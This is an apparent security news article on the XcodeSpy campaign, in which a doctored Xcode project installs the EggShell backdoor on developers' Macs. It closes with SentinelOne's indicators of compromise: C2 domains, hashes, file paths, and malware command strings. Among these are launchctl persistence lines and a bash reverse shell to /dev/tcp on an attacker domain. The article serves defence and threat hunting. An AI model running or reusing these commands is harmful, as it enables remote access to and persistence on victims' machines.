Xcode Developers Targeted with EggShell Backdoor by XcodeSpy Malware
The malicious project installs a customized version of the EggShell backdoor on Apple developers’ computers, making way for data exfiltration and spying.
According to research published by SentinelOne, hackers are now targeting iOS developers with an EggShell backdoor that has worked its way into a shared Xcode project.
The company was alerted by an anonymous researcher that a malicious code was corrupting a development project in Xcode, Apple’s integrated development environment (IDE) used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.
We recently became aware of a trojanized Xcode project in the wild targeting iOS developers thanks to a tip from an anonymous researcher. The malicious project is a doctored version of a legitimate, open-source project available on GitHub. The project offers iOS developers several advanced features for animating the iOS Tab Bar based on user interaction.
The malicious Xcode project, dubbed XcodeSpy, installs an EggShell backdoor version on the developer’s macOS computer, which is able to record the victim’s microphone, camera, and keyboard movements, as well as uploading and downloading files.
As claimed by SentinelOne researchers, the fact that there is malicious code exploiting a shared Xcode project could raise questions about whether the hackers are targeting developers in order to carry on a supply chain attack.
Supply chain attacks concerned developers for a long time, especially in recent months when they have quickly progressed as the federal government and private sector work to respond to the SolarWinds incident, in which alleged Russian actors are suspected to have conducted a widespread espionage operation through a bad software update. This attack has shown that there is no institution too big to be breached and no organization is completely safe from ransomware.
There are two known variants of EggShell:
#1. Custom backdoors which contain a number of encrypted C2 URLs
#2. Encrypted strings for various file paths
One encrypted string particularly is shared between the doctored Xcode project and the custom backdoors, connecting them as part of the same ‘XcodeSpy’ campaign, the researchers said.
Both samples were uploaded to the malware sharing repository VirusTotal in August and October 2020.
The later sample was also found in the wild in late 2020 on a victim’s Mac in the United States. For reasons of confidentiality, we are unable to provide further details about the ITW incident. However, the victim reported that they are repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities.
As the true reason behind these attacks is not known yet, the way the hackers infiltrated the Eggshell backdoor into the Xcode project could apply in other cases as well.
To help threat hunters and developers sidestep such attacks, SentinelOne researchers provided a list of known indicators of compromise:
URLs & Resolving IPs
www[.]cralev.me/
hxxps://www[.]liveupdate.cc/preview/update.php
hxxps://www[.]appmarket.co/category/search.php
hxxps://www[.]recentnews.cc/latest/details.php
hxxps://www[.]truckrental.cc/order/search.php
hxxps://www[.]everestnote.com/sheet/list.php
hxxps://www[.]alinbox.co/product/product_detail.php
hxxps://www[.]suppro.co/category/search.php
193.34.167.111
193.34.167.205
EggShell bins: */.update
SHA 256: 6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b
SHA 1: 556a2174398890e3d628aec0163a42a7b7fb8ffd
SHA 256: cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134
SHA 1: 0ae9d61185f793c6d53e560e91265583675abeb6
Xcode proj: TabBarInteraction.zip
SHA 256: 1cfa154d0145c1fe059ffe61e7b295c16bbc0e0b0e707e7ad0b5f76c7d6b66d2
SHA 1: d65334d6c829955947f0ceb2258581c59cfd7dab
Encoded Filepaths
~/Library/Application Scripts/com.apple.TextEdit/.stors
~/Library/Application Scripts/com.apple.Preview/.stors
~/Library/Application Scripts/com.apple.usernoted/.wfy1607
~/Library/Application Scripts/com.apple.TextEdit/.scriptdb
~/Library/Application Support/com.apple.AppStore/.update
~/Library/Application Support/com.apple.usernoted/.wfy1607
~/Library/LaunchAgents/com.apple.usagestatistics.plist
~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist
/private/tmp/.osacache
/private/tmp/.osacache2
/private/tmp/.update
/tmp/.avatmp
/private/tmp/.wt0217.lck
/private/tmp/.tag
Behavioral Indicators
killall %@;sleep 3;cp “%@” “%@”;chmod +x “%@”;”%@” %@ 1>/dev/null 2>/dev/null
if (! pgrep -x %@ >/dev/null);then cp “%@” “%@”;chmod +x “%@”;”%@”;fi;
sleep 1;launchctl unload “%@” > /dev/null;launchctl load “%@” > /dev/null
launchctl unload “%@” 2>/dev/null; rm “%@”
echo mdbcmd > /private/tmp/.tag;bash&> /dev/tcp/www.cralev.me/443 0>&1 &